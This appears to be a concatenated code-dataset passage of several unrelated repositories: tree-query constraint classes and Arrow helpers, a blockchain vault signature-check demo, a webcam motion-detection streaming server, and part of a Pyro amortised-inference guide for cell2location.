class CBFromSet:
_kind = 'C#.Constraints.FromSet'
def __init__(self, frame, files=None):
self.kind = CBFromSet._kind
self.frame = frame
self.file = None
self.files_constraint = files
def __str__(self):
return '$from_set'
def write_file(self, path):
self.file = path
os.makedirs(os.path.dirname(self.file), exist_ok=True)
self.frame.to_csv(self.file, index=False, header=False, sep='\t')
@staticmethod
def kind():
return CBFromSet._kind
```
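A small illustrative sketch (not part of the original repository) showing how the constraint objects above render into query-path fragments; the import path mirrors the file location and the argument values are assumptions:
```python
# Hypothetical usage of the constraint classes defined above.
from codebook.csharp.constraints import CBName, CBFieldIndex, CBStepsAway

name = CBName("Dispose")
print(str(name))                                      # name=`Dispose`
print(name.to_path("(invocation_expression)"))        # "Dispose"=(invocation_expression)
print(str(CBFieldIndex(field="arguments", index=0)))  # $.f_arguments[0]
print(str(CBStepsAway(steps=2, op="<=")))             # $steps_away{<=2}
```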
#### File: codebookold/python/modifiers.py
```python
class CBRhs:
_kind = 'Python.Mods.TheRhs'
def __init__(self):
self.kind = CBRhs._kind
def __str__(self):
return '$the_rhs'
@staticmethod
def kind():
return CBRhs._kind
class CBLhs:
_kind = 'Python.Mods.TheLhs'
def __init__(self):
self.kind = CBLhs._kind
def __str__(self):
return '$the_lhs'
@staticmethod
def kind():
return CBLhs._kind
class CBValueIs:
_kind = 'Python.Mods.ValueIs'
def __init__(self):
self.kind = CBValueIs._kind
def __str__(self):
return '$value_is'
@staticmethod
def kind():
return CBValueIs._kind
class CBFirstArgIs:
_kind = 'Python.Mods.FirstArgIs'
def __init__(self):
self.kind = CBFirstArgIs._kind
def __str__(self):
return '$first_arg'
@staticmethod
def kind():
return CBFirstArgIs._kind
class CBSecondArgIs:
_kind = 'Python.Mods.SecondArgIs'
def __init__(self):
self.kind = CBSecondArgIs._kind
def __str__(self):
return '$second_arg'
@staticmethod
def kind():
return CBSecondArgIs._kind
class CBSubscriptIs:
_kind = 'Python.Mods.SubscriptIs'
def __init__(self):
self.kind = CBSubscriptIs._kind
def __str__(self):
return '$subscript_is'
@staticmethod
def kind():
return CBSubscriptIs._kind
class CBAttributeIs:
_kind = 'Python.Mods.AttributeIs'
def __init__(self):
self.kind = CBAttributeIs._kind
def __str__(self):
return '$attribute_is'
@staticmethod
def kind():
return CBAttributeIs._kind
class CBObjectIs:
_kind = 'Python.Mods.ObjectIs'
def __init__(self):
self.kind = CBObjectIs._kind
def __str__(self):
return '$object_is'
@staticmethod
def kind():
return CBObjectIs._kind
class CBOnlySubscriptIs:
_kind = 'Python.Mods.OnlySubscriptIs'
def __init__(self):
self.kind = CBOnlySubscriptIs._kind
def __str__(self):
return '$only_subscript_is'
@staticmethod
def kind():
return CBOnlySubscriptIs._kind
class CBAnyArgIs:
_kind = 'Python.Mods.AnyArgIs'
def __init__(self):
self.kind = CBAnyArgIs._kind
def __str__(self):
return '$any_arg_is'
@staticmethod
def kind():
return CBAnyArgIs._kind
class CBAnyParentIs:
_kind = 'Python.Mods.AnyParentIs'
def __init__(self):
self.kind = CBAnyParentIs._kind
def __str__(self):
return '$any_parent_is'
@staticmethod
def kind():
return CBAnyParentIs._kind
class CBUses:
_kind = 'Python.Mods.Uses'
def __init__(self):
self.kind = CBUses._kind
def __str__(self):
return '$uses'
@staticmethod
def kind():
return CBUses._kind
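# NOTE: the class below redefines CBFirstArgIs declared earlier in this module;
# the later definition (rendering '$first_arg_is') is the one left bound at import time.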
class CBFirstArgIs:
_kind = 'Python.Mods.FirstArgIs'
def __init__(self):
self.kind = CBFirstArgIs._kind
def __str__(self):
return '$first_arg_is'
@staticmethod
def kind():
return CBFirstArgIs._kind
class CBRefTo:
_kind = 'Python.Mods.RefTo'
def __init__(self):
self.kind = CBRefTo._kind
def __str__(self):
return '$ref_to'
@staticmethod
def kind():
return CBRefTo._kind
class CBEveryChildIs:
_kind = 'Python.Mods.EveryChildIs'
def __init__(self):
self.kind = CBEveryChildIs._kind
def __str__(self):
return '$every_child'
@staticmethod
def kind():
return CBEveryChildIs._kind
class CBAnyChildIs:
_kind = 'Python.Mods.AnyChildIs'
def __init__(self):
self.kind = CBAnyChildIs._kind
def __str__(self):
return '$any_child'
@staticmethod
def kind():
return CBAnyChildIs._kind
class CBChildIs:
_kind = 'Python.Mods.ChildIs'
def __init__(self):
self.kind = CBChildIs._kind
def __str__(self):
return '$child'
@staticmethod
def kind():
return CBChildIs._kind
class CBFirstChildIs:
_kind = 'Python.Mods.FirstChildIs'
def __init__(self):
self.kind = CBFirstChildIs._kind
def __str__(self):
return '$first_child'
@staticmethod
def kind():
return CBFirstChildIs._kind
class CBModuleName:
_kind = 'Python.Mods.ModuleName'
def __init__(self):
self.kind = CBModuleName._kind
def __str__(self):
return '$module_name'
@staticmethod
def kind():
return CBModuleName._kind
class CBImportedName:
_kind = 'Python.Mods.ImportedName'
def __init__(self):
self.kind = CBImportedName._kind
def __str__(self):
return '$imported_name'
@staticmethod
def kind():
return CBImportedName._kind
class CBModuleRoot:
_kind = 'Python.Mods.ModuleRoot'
def __init__(self):
self.kind = CBModuleRoot._kind
def __str__(self):
return '$module_root'
@staticmethod
def kind():
return CBModuleRoot._kind
class CBCallTarget:
_kind = 'Python.Mods.CallTarget'
def __init__(self):
self.kind = CBCallTarget._kind
def __str__(self):
return '$call_target'
@staticmethod
def kind():
return CBCallTarget._kind
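# NOTE: the class below reuses the name CBFirstChildIs defined earlier in this module
# (kind 'Python.Mods.FirstChildIs'); this later definition wins at import time, so the
# earlier '$first_child' variant is no longer reachable under this name.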
class CBFirstChildIs:
_kind = 'Python.Mods.TheFirstChild'
def __init__(self):
self.kind = CBFirstChildIs._kind
def __str__(self):
return '$the_first_child'
@staticmethod
def kind():
return CBFirstChildIs._kind
class CBSecondChildIs:
_kind = 'Python.Mods.TheSecondChild'
def __init__(self):
self.kind = CBSecondChildIs._kind
def __str__(self):
return '$the_second_child'
@staticmethod
def kind():
return CBSecondChildIs._kind
class CBThirdChildIs:
_kind = 'Python.Mods.TheThirdChild'
def __init__(self):
self.kind = CBThirdChildIs._kind
def __str__(self):
return '$the_third_child'
@staticmethod
def kind():
return CBThirdChildIs._kind
class CBNoThirdChild:
_kind = 'Python.Mods.NoThirdChild'
def __init__(self):
self.kind = CBNoThirdChild._kind
def __str__(self):
return '$no_third_child'
@staticmethod
def kind():
return CBNoThirdChild._kind
```
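An illustrative note (not from the original repository): the modifier classes above are thin markers whose string forms are `$...` tokens, so query fragments can be assembled by joining them:
```python
# Hypothetical sketch: rendering a few modifiers into a query fragment.
mods = [CBCallTarget(), CBAnyArgIs(), CBRefTo()]
print(" ".join(str(m) for m in mods))  # -> $call_target $any_arg_is $ref_to
```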
#### File: notebooks/utils/__init__.py
```python
from .timing import timing
from .cbjava import decode_path as decode_java_path
from .cbjava import type_to_idx as java_type_to_idx
import json
import regex
import pickle
import os.path
import xxhash
import pandas as pd
import pyarrow as pa
import pyarrow.dataset as ds
import pyarrow.parquet as pq
import pyarrow.gandiva as gd
__F_CACHE = {}
__DATA = None
__T_CACHE = {}
QUERY_LANG = r"^((\{(>|<)?=?\d*\})(\^)?(\".*?\"=)?\(?([a-z_0-9]+)?\)?(\.f_[a-z_0-9]+)?(\[\d+\])?)+$"
SUB_QUERY_LANG = r"(\{(>|<)?=?\d*\})(\^)?(\".*?\"=)?\(?([a-z_0-9]+)?\)?(\.f_[a-z_0-9]+)?(\[\d+\])?"
QUERY_REGEX = regex.compile(QUERY_LANG)
SUB_QUERY_REGEX = regex.compile(SUB_QUERY_LANG)
def get_text_fragement(fid, start, end, debug=False):
if debug:
return 'get_file({}@{}:{})'.format(fid, start, end)
try:
if fid not in __F_CACHE:
with open('/data/raw-files/{}.txt'.format(fid), 'rb') as fh:
__F_CACHE[fid] = fh.read()
return __F_CACHE[fid].decode('utf-8')[start:end]
except Exception as ex:
return str(ex) + '\ncant find {}@{}:{}'.format(fid, start, end)
def decode_op_dist(dist):
if dist is None or len(dist.replace('{', '').replace('}', '')) <= 0:
return 0, int(0)
dist = dist[1:-1]
if dist[0] == '=':
return 5, int(dist[1:])
elif dist[:2] == '<=':
return 2, int(dist[2:])
elif dist[:2] == '>=':
return 4, int(dist[2:])
elif dist[0] == '<':
return 1, int(dist[1:])
elif dist[0] == '>':
return 3, int(dist[1:])
else:
return 0, int(dist)
def parse_query(query_string, type_to_idx, debug=False):
builder = gd.TreeExprBuilder()
if query_string[0] != '{':
query_string = '{}' + query_string
match = regex.match(QUERY_REGEX, query_string, version=regex.V1)
target_func = 'match_tree_path_{}_'.format(len(match.captures(1)))
params = []
first_label = '?'
for i, sub_string in enumerate(match.captures(1)):
sub_match = regex.match(SUB_QUERY_REGEX, sub_string, version=regex.V1)
steps, _, negate, name, label, field, index = sub_match.groups()
if first_label == '?':
first_label = label
negate = negate == '^'
match_name = name is not None
name = name[1:-2] if match_name else None
match_label = label is not None
label = type_to_idx(label) if match_label else 0
match_field = field is not None
field = type_to_idx(field[1:]) if match_field else 0
match_index = index is not None
index = int(index[1:-1]) if match_index else 0
steps_op, steps_dist = decode_op_dist(steps)
target_func += ('1' if negate else '0')
target_func += ('1' if match_label else '0')
target_func += ('1' if match_name else '0')
target_func += ('1' if match_field else '0')
target_func += ('1' if match_index else '0')
if match_label:
params.append(builder.make_literal(label, pa.uint16()))
if match_name:
as_hash = int.from_bytes(
xxhash.xxh64(name, seed=3235823838).intdigest().to_bytes(8, byteorder='little'),
signed=True, byteorder="little"
)
params.append(builder.make_literal(as_hash, pa.int64()))
if match_field:
params.append(builder.make_literal(field, pa.uint16()))
if match_index:
params.append(builder.make_literal(index, pa.uint16()))
if steps_op == 5:
target_func += '3'
params.append(builder.make_literal(steps_dist, pa.uint16()))
elif steps_op == 4:
target_func += '2'
params.append(builder.make_literal(steps_dist - 1, pa.uint16()))
elif steps_op == 3:
target_func += '2'
params.append(builder.make_literal(steps_dist, pa.uint16()))
elif steps_op == 2:
target_func += '1'
params.append(builder.make_literal(steps_dist + 1, pa.uint16()))
elif steps_op == 1:
target_func += '1'
params.append(builder.make_literal(steps_dist, pa.uint16()))
else:
target_func += '0'
target_func += '_'
target_func = target_func[:-1]
if debug:
print(first_label, target_func, params)
return first_label, target_func, params, builder
def get_text_from_capture(res, cidx):
offset = 32 + (cidx - 1) * 40
return get_text_fragement(
int.from_bytes(res[0:8], signed=True, byteorder="little"),
int.from_bytes(res[offset+0:offset+4], signed=False, byteorder="little"),
int.from_bytes(res[offset+4:offset+8], signed=False, byteorder="little")
)
def get_texts_from_capture(res, cidx):
offset = 32 + (cidx - 1) * 40
out = []
for r in res:
out.append(get_text_fragement(
int.from_bytes(r[0:8], signed=True, byteorder="little"),
int.from_bytes(r[offset+0:offset+4], signed=False, byteorder="little"),
int.from_bytes(r[offset+4:offset+8], signed=False, byteorder="little")
))
return out
def query_java(query_string, extra="file_id", name_is=None, name_regex=None):
global __DATA, __T_CACHE
root_type, target_func, params, builder = parse_query(query_string, java_type_to_idx)
as_table = None
proj = None
if __DATA is None:
__DATA = ds.dataset('/data/parquet', format='parquet', partitioning='hive')
if root_type not in __T_CACHE:
the_filter = ds.field('type') == root_type
extra_cols = [extra]
if name_is is not None:
extra_cols.append('name')
the_filter = the_filter & (ds.field('name') == name_is)
elif name_regex is not None:
print('Regex name filter not yet supported')
__T_CACHE[root_type] = __DATA.to_table(
columns=['path'] + extra_cols,
filter=the_filter
)
as_table = __T_CACHE[root_type]
params = [
builder.make_field(as_table.schema.field(extra)),
builder.make_field(as_table.schema.field('path'))
] + params
proj = gd.make_projector(as_table.schema, [
builder.make_expression(
builder.make_function(target_func, params, pa.binary()),
pa.field("result", pa.binary())
)
], pa.default_memory_pool())
total = []
for record_batch in as_table.to_batches():
res, = proj.evaluate(record_batch)
temp = res.to_pandas()
total.append(temp[temp != b''])
final = pd.concat(total)
return final
def merge_paths(series_l, series_r, on):
on_l, on_r = on
frame_l = series_l
if not isinstance(series_l, pd.DataFrame):
frame_l = series_l.to_frame(name="dat")
frame_r = series_r
if not isinstance(series_r, pd.DataFrame):
frame_r = series_r.to_frame(name="dat")
target_l = None
if on_l.startswith('left.'):
target_l = frame_l.dat_l
on_l = on_l.replace('left.', '')
elif on_l.startswith('right.'):
target_l = frame_l.dat_r
on_l = on_l.replace('right.', '')
else:
target_l = frame_l.dat
target_r = None
if on_r.startswith('left.'):
target_r = frame_r.dat_l
on_r = on_r.replace('left.', '')
elif on_r.startswith('right.'):
target_r = frame_r.dat_r
on_r = on_r.replace('right.', '')
else:
target_r = frame_r.dat
if on_l.startswith('defs.'):
cindex = int(on_l.replace('defs.', '')) - 1
frame_l['key'] = target_l.str[16+40*cindex:24+40*cindex]
elif on_l.startswith('gids.'):
cindex = int(on_l.replace('gids.', '')) - 1
frame_l['key'] = target_l.str[8+40*cindex:16+40*cindex]
if on_r.startswith('defs.'):
cindex = int(on_r.replace('defs.', '')) - 1
frame_r['key'] = target_r.str[16+40*cindex:24+40*cindex]
elif on_r.startswith('gids.'):
cindex = int(on_r.replace('gids.', '')) - 1
frame_r['key'] = target_r.str[8+40*cindex:16+40*cindex]
frame_l.columns = frame_l.columns.map(lambda x: str(x) + '_l')
frame_r.columns = frame_r.columns.map(lambda x: str(x) + '_r')
return frame_l.merge(
frame_r,
how="inner",
left_on="key_l",
right_on="key_r"
)
def get_results(result_set, labels):
def _get_all_labels(cur):
if isinstance(cur, list):
res = []
for i, l in enumerate(cur):
if l is not None:
res.append(('dat', i + 1, l))
return res
return list(map(
lambda x: (x[0] + '_l', x[1], x[2]),
_get_all_labels(cur['left'])
)) + list(map(
lambda x: (x[0] + '_r', x[1], x[2]),
_get_all_labels(cur['right'])
))
results_map = {}
for path, idx, label in _get_all_labels(labels):
if path == 'dat':
results_map[label] = get_texts_from_capture(result_set, idx)
else:
results_map[label] = get_texts_from_capture(result_set[path], idx)
return results_map
```
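A hedged usage sketch for the helpers above. Queries follow the `QUERY_LANG` mini-language: each step is a `{distance}` constraint plus an optional `^` negation, optional `"name"=`, optional `(label)`, `.f_field` and `[index]`. The label, name and capture index below are illustrative assumptions, and the sketch presumes the `/data/parquet` and `/data/raw-files` layouts referenced in the module exist:
```python
# Hypothetical sketch: a two-step tree-path query over the Java dataset.
# '(method_invocation){=1}"println"=(identifier)' asks for a method_invocation
# node with an identifier child named "println" exactly one step away.
results = query_java('(method_invocation){=1}"println"=(identifier)')
print(len(results), "matching paths")
# Capture indices are 1-based; assuming capture 1 corresponds to the first
# query step, decode a few of its source spans back to text.
print(get_texts_from_capture(results, 1)[:5])
```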
#### File: notebooks/utils/timing.py
```python
import contextlib
import time
@contextlib.contextmanager
def timing(description: str) -> None:
start = time.perf_counter()
yield
elapsed_time = time.perf_counter() - start
print(f"{description}: {elapsed_time:.4f}s")
``` |
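A quick usage example for the `timing` context manager above (illustrative only; the import path is an assumption based on the file layout):
```python
import time
from utils.timing import timing  # assumed import path

# Wrap any block of work to report its wall-clock duration.
with timing("sleep demo"):
    time.sleep(0.25)  # stand-in for real work
# prints something like: sleep demo: 0.2503s
```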
{
"source": "jjhesk/TrustVault",
"score": 2
} |
#### File: TrustVault/codec/BaseVault.py
```python
from moody.contracttool import ContractTool
from codec.gen_py.enrockvault import Enrockvault
from codec.gen_py.tc20 import Tc20
from codec.gen_py.test_enclose import TestEnclose
from codec.gen_py.vault_config_provider import VaultConfigProvider
from codec.gen_py.verify_signature import VerifySignature
from key import NETWORK
class TokenBase(ContractTool):
def defineToken(self, name: str) -> "TokenBase":
if not self.hasContractName(name):
print(f"Token {name} is not found..")
exit(0)
self.token: Tc20 = Tc20(self, self.getAddr(name))
self.token.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineTVault(self) -> "TokenBase":
self.tenclose: TestEnclose = TestEnclose(self, self.getAddr("TestEnclose"))
self.tenclose.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineVault(self) -> "TokenBase":
self.envault: Enrockvault = Enrockvault(self, self.getAddr("Enrockvault"))
self.envault.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineVaultConfigProvider(self) -> "TokenBase":
self.vault_config_provider: VaultConfigProvider = VaultConfigProvider(self, self.getAddr("VaultConfigProvider"))
self.vault_config_provider.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
def defineSignatureProvider(self) -> "TokenBase":
self.versign: VerifySignature = VerifySignature(self, self.getAddr("VerifySignature"))
self.versign.CallAutoConf(self).CallDebug(True).CallContractWait(self.waitSec)
return self
class BsVault(TokenBase):
def __init__(self, path_bs: str):
# super().__init__(NETWORK, path_bs, OKTEST_DEPLOY, WALLETS)
super().__init__(NETWORK, path_bs, {}, [])
self.withPOA()
self.setWorkspace(path_bs).Auth("")
self.connect(path_bs, False)
self.OverrideGasConfig(6000000, 1059100000)
self.OverrideChainConfig(10 ** 18, 6)
def By(self, player: int) -> "BsVault":
# switch account to the index A account
self.AuthIndex(player)
return self
```
#### File: jjhesk/TrustVault/demo_verify.py
```python
from moody import Bolors
from key import ROOT
from codec.BaseVault import BsVault
def Prod() -> BsVault:
# ========================== Of course
j = BsVault(ROOT)
return j
"""
from the request
Address string `json:"wallet_address"`
Signed string `json:"signed_message"`
Hash string `json:"hash_message"`
Original string `json:"original_message"`
"""
hash_message = ""
signed_message = ""
res = Prod().versign.recover_signer(
eth_signed_message_hash=hash_message,
signature=signed_message
)
# the message is now success or not
result = "success" if res is True else "failed"
print(f"The verification is {result}")
``` |
{
"source": "jjhickman/panoptix",
"score": 3
} |
#### File: panoptix/camera/camera.py
```python
import time
import argparse
import socket
import asyncio
from aiohttp.payload_streamer import StreamWrapperPayload
import socketio
import cv2
import base64
import logging
import multiprocessing
from detector import Detector
import requests
import aiohttp
from aiohttp import web
stream_url = ''
sio = socketio.AsyncServer()
logger = None
static_back = None
detector = []
frame_queue = multiprocessing.Queue(1)
"""
=============================================================================
REST API routes
=============================================================================
"""
# GET request handler for stream
async def index(request):
global logger
index_html = """<html>
<head><title>""" + socket.gethostname() + """</title></head>
<body>
<h1>""" + socket.gethostname() + """</h1>
<img id='image' src=''/>
<script src="https://cdn.socket.io/3.1.1/socket.io.min.js" integrity="<KEY>" crossorigin="anonymous"></script>
<script>
const socket = io.connect('""" + stream_url + """');
console.log("Connection started")
socket.on('image', (image) => {
console.log("New image!");
let imageStr = new TextDecoder("utf-8").decode(image);
document.getElementById('image').src = 'data:image/jpeg;base64,' + imageStr;
});
</script>
</body>
</html>"""
logger.debug('Request for stream: {}\n\nSending: {}'.format(request, index_html))
return web.Response(text=index_html, content_type='text/html')
def detect(config, q, url, logger):
detector = Detector(bg_history=10,
bg_skip_frames=1,
movement_frames_history=2,
brightness_discard_level=5,
bg_subs_scale_percent=0.2,
pixel_compression_ratio=0.1,
group_boxes=True,
expansion_step=5)
awake_time = time.time()
while True:
frame = q.get()
if frame is None:
continue
boxes, f = detector.detect(frame)
if len(boxes) > 0 and time.time() >= awake_time:
response = requests.post(url, data={'source': stream_url, 'time': round(time.time() * 1000)}, timeout=500)
if response.status_code == 200:
logger.debug('Successfully notified hub!')
else:
logger.debug(response.text)
"""
=============================================================================
SocketIO camera capture async loop for web stream and for GPIO input
=============================================================================
"""
async def stream(app, q):
global logger, stream_url, frame_queue
refresh_seconds = 1.0 / 20
logger.debug('Updating stream every {} seconds'.format(refresh_seconds))
try:
while True:
ret, frame = app['capture'].read()
frame_queue.put(frame)
if ret == False:
logger.error("FAILED READING FROM CAPTURE")
break
ret, jpg_image = cv2.imencode('.jpg', frame)
base64_image = base64.b64encode(jpg_image)
await app['socket'].emit('image', base64_image)
await asyncio.sleep(refresh_seconds)
logger.debug('Ended stream!')
except asyncio.CancelledError:
logger.debug('Stream cancelled')
"""
=============================================================================
SocketIO handles
=============================================================================
"""
@sio.on('finished')
async def handle_finish(sid, data):
logger.info('Client {} finished job. Disconnecting...'.format(sid))
await sio.disconnect(sid)
@sio.event
async def connect(sid, environ):
logger.info('CONNECTED to client with id: {}'.format(sid))
@sio.event
def disconnect(sid):
logger.info('DISCONNECTED from client with id: {}'.format(sid))
"""
=============================================================================
Setup and configuration for GPIO, socketio, and web server/API
=============================================================================
"""
def initialize():
global sio, stream_url, logger
parser = argparse.ArgumentParser()
parser.add_argument('--endpoint', '-e', type=str, default='192.168.50.200')
parser.add_argument('--username', '-u', type=str, default='username')
parser.add_argument('--password', '-p', type=str, default='password')
parser.add_argument('--cooldown', '-c', type=int, default=15)
parser.add_argument('--threshold', '-t', type=float, default=0.1)
args = parser.parse_args()
log_formatter = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s")
logger = logging.getLogger('aiohttp.server')
logger.setLevel(logging.DEBUG)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
app = web.Application()
app['config'] = args
print(socket.gethostbyname(socket.gethostname()))
stream_url = 'http://{}:{}'.format(socket.gethostbyname(socket.gethostname()), 8888)
print('Streaming from {}'.format(stream_url))
sio.attach(app)
app['socket'] = sio
app.router.add_get('/', index)
app.on_startup.append(start_tasks)
app.on_cleanup.append(cleanup_tasks)
return app, socket.gethostbyname(socket.gethostname())
#return app, app['config'].address
async def start_tasks(app):
app['capture'] = cv2.VideoCapture(0)
app['stream'] = app.loop.create_task(stream(app, frame_queue))
async def cleanup_tasks(app):
app['capture'].release()
cv2.destroyAllWindows()
if __name__ == '__main__':
app, address = initialize()
worker = multiprocessing.Process(target=detect, args=(app['config'], frame_queue, stream_url, logger))
worker.start()
web.run_app(app, host=socket.gethostbyname(socket.gethostname()), port=8888)
``` |
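The `detect()` worker above notifies a hub by POSTing form-encoded `source` and `time` fields to a URL passed in at startup; the hub endpoint itself is not part of this file. A minimal sketch of a compatible receiver, where the `/motion` route name and port are assumptions:
```python
from aiohttp import web

async def handle_motion(request):
    # the camera posts form-encoded 'source' and 'time' fields
    data = await request.post()
    print("motion reported by", data.get("source"), "at", data.get("time"))
    return web.Response(text="ok")

hub = web.Application()
hub.router.add_post("/motion", handle_motion)
# web.run_app(hub, port=8080)  # uncomment to serve
```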
{
"source": "jjhong922/cell2location",
"score": 2
} |
#### File: cell2location/distributions/AutoNormalEncoder.py
```python
from contextlib import ExitStack # python 3
from copy import deepcopy
import numpy as np
import pyro
import pyro.distributions as dist
import torch
from pyro.distributions.transforms import SoftplusTransform
from pyro.distributions.util import sum_rightmost
from pyro.infer.autoguide import AutoGuide
from pyro.infer.autoguide import AutoGuideList as PyroAutoGuideList
from pyro.infer.autoguide.guides import deep_getattr, deep_setattr
from pyro.infer.autoguide.utils import helpful_support_errors
from pyro.nn import PyroModule, PyroParam
from pyro.nn.module import to_pyro_module_
from scvi._compat import Literal
from scvi.nn import FCLayers
from torch.distributions import biject_to
class FCLayersPyro(FCLayers, PyroModule):
pass
class AutoGuideList(PyroAutoGuideList):
def quantiles(self, quantiles, *args, **kwargs):
"""
Returns the posterior quantile values of each latent variable.
Parameters
----------
quantiles
A list of requested quantiles between 0 and 1.
Returns
-------
A dict mapping sample site name to quantiles tensor.
"""
result = {}
for part in self:
result.update(part.quantiles(quantiles, *args, **kwargs))
return result
class AutoNormalEncoder(AutoGuide):
"""
AutoNormal posterior approximation for amortised inference,
where mean and sd of the posterior distributions are approximated using a neural network:
mean, sd = encoderNN(input data).
The class supports single encoder for all parameters as well as one encoder per parameter.
The output of encoder network is treated as a hidden layer, mean and sd are a linear function of hidden layer nodes,
sd is transformed to positive scale using softplus. Data is log-transformed on input.
This class requires `amortised_plate_sites` dictionary with details about amortised variables (see below).
Guide will have the same call signature as the model, so any argument to the model can be used for encoding as
annotated in `amortised_plate_sites`, but it does not have to be the same as observed data in the model.
"""
def __init__(
self,
model,
amortised_plate_sites: dict,
n_in: int,
n_hidden: dict = None,
init_param=0,
init_param_scale: float = 1 / 50,
scales_offset: float = -2,
encoder_class=FCLayersPyro,
encoder_kwargs=None,
multi_encoder_kwargs=None,
encoder_instance: torch.nn.Module = None,
create_plates=None,
encoder_mode: Literal["single", "multiple", "single-multiple"] = "single",
):
"""
Parameters
----------
model
Pyro model
amortised_plate_sites
Dictionary with amortised plate details:
the name of observation/minibatch plate,
indexes of model args to provide to encoder,
variable names that belong to the observation plate
and the number of dimensions in non-plate axis of each variable - such as:
{
"name": "obs_plate",
"input": [0], # expression data + (optional) batch index ([0, 2])
"input_transform": [torch.log1p], # how to transform input data before passing to NN
"sites": {
"n_s_cells_per_location": 1,
"y_s_groups_per_location": 1,
"z_sr_groups_factors": self.n_groups,
"w_sf": self.n_factors,
"l_s_add": 1,
}
}
n_in
Number of input dimensions (for encoder_class).
n_hidden
Number of hidden nodes in each layer, one of 3 options:
1. Integer denoting the number of hidden nodes
2. Dictionary with {"single": 200, "multiple": 200} denoting the number of hidden nodes for each `encoder_mode` (See below)
3. Allowing different number of hidden nodes for each model site. Dictionary with the number of hidden nodes for single encode mode and each model site:
{
"single": 200
"n_s_cells_per_location": 5,
"y_s_groups_per_location": 5,
"z_sr_groups_factors": 128,
"w_sf": 128,
"l_s_add": 5,
}
init_param
Not implemented yet - initial values for amortised variables.
init_param_scale
How to scale/normalise initial values for weights converting hidden layers to mean and sd.
encoder_class
Class for defining encoder network.
encoder_kwargs
Keyword arguments for encoder_class.
multi_encoder_kwargs
Optional separate keyword arguments for encoder_class, useful when encoder_mode == "single-multiple".
encoder_instance
Encoder network instance, overrides class input and the input instance is copied with deepcopy.
create_plates
Function for creating plates
encoder_mode
Use single encoder for all variables ("single"), one encoder per variable ("multiple")
or a single encoder in the first step and multiple encoders in the second step ("single-multiple").
"""
super().__init__(model, create_plates=create_plates)
self.amortised_plate_sites = amortised_plate_sites
self.encoder_mode = encoder_mode
self.scales_offset = scales_offset
self.softplus = SoftplusTransform()
if n_hidden is None:
n_hidden = {"single": 200, "multiple": 200}
else:
if isinstance(n_hidden, int):
n_hidden = {"single": n_hidden, "multiple": n_hidden}
elif not isinstance(n_hidden, dict):
raise ValueError("n_hidden must be either in or dict")
encoder_kwargs = deepcopy(encoder_kwargs) if isinstance(encoder_kwargs, dict) else dict()
encoder_kwargs["n_hidden"] = n_hidden["single"]
self.encoder_kwargs = encoder_kwargs
if multi_encoder_kwargs is None:
multi_encoder_kwargs = deepcopy(encoder_kwargs)
self.multi_encoder_kwargs = multi_encoder_kwargs
if "multiple" in n_hidden.keys():
self.multi_encoder_kwargs["n_hidden"] = n_hidden["multiple"]
self.single_n_in = n_in
self.multiple_n_in = n_in
self.n_out = (
np.sum([np.sum(amortised_plate_sites["sites"][k]) for k in amortised_plate_sites["sites"].keys()]) * 2
)
self.n_hidden = n_hidden
self.encoder_class = encoder_class
self.encoder_instance = encoder_instance
if "single" in self.encoder_mode:
# create a single encoder NN
if encoder_instance is not None:
self.one_encoder = deepcopy(encoder_instance)
# convert to pyro module
to_pyro_module_(self.one_encoder)
else:
self.one_encoder = encoder_class(
n_in=self.single_n_in, n_out=self.n_hidden["single"], **self.encoder_kwargs
)
if "multiple" in self.encoder_mode:
self.multiple_n_in = self.n_hidden["single"]
self.init_param_scale = init_param_scale
def _setup_prototype(self, *args, **kwargs):
super()._setup_prototype(*args, **kwargs)
self._event_dims = {}
self._cond_indep_stacks = {}
self.hidden2locs = PyroModule()
self.hidden2scales = PyroModule()
if "multiple" in self.encoder_mode:
# create module for collecting multiple encoder NN
self.multiple_encoders = PyroModule()
# Initialize guide params
for name, site in self.prototype_trace.iter_stochastic_nodes():
# Collect unconstrained event_dims, which may differ from constrained event_dims.
with helpful_support_errors(site):
init_loc = biject_to(site["fn"].support).inv(site["value"].detach()).detach()
event_dim = site["fn"].event_dim + init_loc.dim() - site["value"].dim()
self._event_dims[name] = event_dim
# Collect independence contexts.
self._cond_indep_stacks[name] = site["cond_indep_stack"]
# determine the number of hidden layers
if "multiple" in self.encoder_mode:
if "multiple" in self.n_hidden.keys():
n_hidden = self.n_hidden["multiple"]
else:
n_hidden = self.n_hidden[name]
elif "single" in self.encoder_mode:
n_hidden = self.n_hidden["single"]
# add linear layer for locs and scales
param_dim = (n_hidden, self.amortised_plate_sites["sites"][name])
init_param = np.random.normal(
np.zeros(param_dim),
(np.ones(param_dim) * self.init_param_scale) / np.sqrt(n_hidden),
).astype("float32")
deep_setattr(
self.hidden2locs,
name,
PyroParam(torch.tensor(init_param, device=site["value"].device, requires_grad=True)),
)
init_param = np.random.normal(
np.zeros(param_dim),
(np.ones(param_dim) * self.init_param_scale) / np.sqrt(n_hidden),
).astype("float32")
deep_setattr(
self.hidden2scales,
name,
PyroParam(torch.tensor(init_param, device=site["value"].device, requires_grad=True)),
)
if "multiple" in self.encoder_mode:
# create multiple encoders
if self.encoder_instance is not None:
# copy instances
encoder_ = deepcopy(self.encoder_instance).to(site["value"].device)
# convert to pyro module
to_pyro_module_(encoder_)
deep_setattr(
self.multiple_encoders,
name,
encoder_,
)
else:
# create instances
deep_setattr(
self.multiple_encoders,
name,
self.encoder_class(n_in=self.multiple_n_in, n_out=n_hidden, **self.multi_encoder_kwargs).to(
site["value"].device
),
)
def _get_loc_and_scale(self, name, encoded_hidden):
"""
Get mean (loc) and sd (scale) of the posterior distribution, as a linear function of encoder hidden layer.
Parameters
----------
name
variable name
encoded_hidden
tensor when `encoder_mode == "single"`
and dictionary of tensors for each site when `encoder_mode == "multiple"`
"""
linear_locs = deep_getattr(self.hidden2locs, name)
linear_scales = deep_getattr(self.hidden2scales, name)
if "multiple" in self.encoder_mode:
# when using multiple encoders extract hidden layer for this parameter
encoded_hidden = encoded_hidden[name]
locs = encoded_hidden @ linear_locs
scales = self.softplus((encoded_hidden @ linear_scales) - self.scales_offset)
return locs, scales
def encode(self, *args, **kwargs):
"""
Apply encoder network to input data to obtain hidden layer encoding.
Parameters
----------
args
